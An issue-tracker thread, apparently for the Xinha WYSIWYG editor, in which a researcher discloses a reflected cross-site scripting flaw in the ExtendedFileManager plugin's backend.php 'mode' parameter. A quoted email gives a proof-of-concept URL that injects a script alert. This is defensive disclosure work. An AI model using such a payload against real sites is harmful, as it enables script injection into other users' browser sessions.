Security Issues in XINHA WYSIWYG 0.96.1

[guest]

Hello there,

we at MajorSecurity? found some security related vulnerabilities within XINHA WYSIWYG Editor. Please tell me the email address I should send the security related details to.

You may contact me at: david.kurz[(at)]majorsecurity[(dot)]net

Best regards,

David Vieira-Kurz Head of Security Research, MajorSecurity?

[ejucovy]

Hmm, have these vulnerabilities been addressed by the changes in 0.96.1 (#1515, #1518)? Or is this ticket still active?

[gogo]

Replying to ejucovy:

Hmm, have these vulnerabilities been addressed by the changes in 0.96.1 (#1515, #1518)? Or is this ticket still active?

I emailed them when they posted, this is what they said...

---

Hello,

first of all thank for the fast answer.

We at MajorSecurity? have discovered some vulnerabilities in one of the Plugins in XINHA WYSIWYG Editor version 0.96.1, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed directly to the "mode" parameter in "backend.php" of the "ExtendedFileManager" Plugin is not properly sanitised before being stored and returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Proof of Concept:

http://localhost/xinha-0.96.1/plugins/ExtendedFileManager/backend.php?__plugin=ExtendedFileManager&__function=manager&backend_data[data]=a%3A9%3A{s%3A17%3A%22max_foldersize_mb%22%3Bi%3A10%3Bs%3A9%3A%22files_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A10%3A%22images_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A9%3A%22files_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A10%3A%22images_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A21%3A%22images_enable_styling%22%3Bb%3A0%3Bs%3A21%3A%22max_filesize_kb_image%22%3Bi%3A200%3Bs%3A20%3A%22max_filesize_kb_link%22%3Bs%3A3%3A%22max%22%3Bs%3A23%3A%22allowed_link_extensions%22%3Ba%3A12%3A{i%3A0%3Bs%3A3%3A%22jpg%22%3Bi%3A1%3Bs%3A3%3A%22gif%22%3Bi%3A2%3Bs%3A2%3A%22js%22%3Bi%3A3%3Bs%3A3%3A%22pdf%22%3Bi%3A4%3Bs%3A3%3A%22zip%22%3Bi%3A5%3Bs%3A3%3A%22txt%22%3Bi%3A6%3Bs%3A3%3A%22psd%22%3Bi%3A7%3Bs%3A3%3A%22png%22%3Bi%3A8%3Bs%3A4%3A%22html%22%3Bi%3A9%3Bs%3A3%3A
%22swf%22%3Bi%3A10%3Bs%3A3%3A%22xml%22%3Bi%3A11%3Bs%3A3%3A%22xls%22%3B}}&backend_data[session_name]=PHPSESSID&backend_data[key_location]=Xinha%3ABackendKey&backend_data[hash]=582686c520f11fc779ada11642d7e3b5711a3c37&PHPSESSID=599be382ae27a9a75cd2e7d039b2098a&mode="<script>alert(/XSS/)</script>

Solution: Web applications should never trust on user generated input and therefore sanatize all input. Edit the source code to ensure that input is properly sanitised.

---

I don't remember if I did anything about it.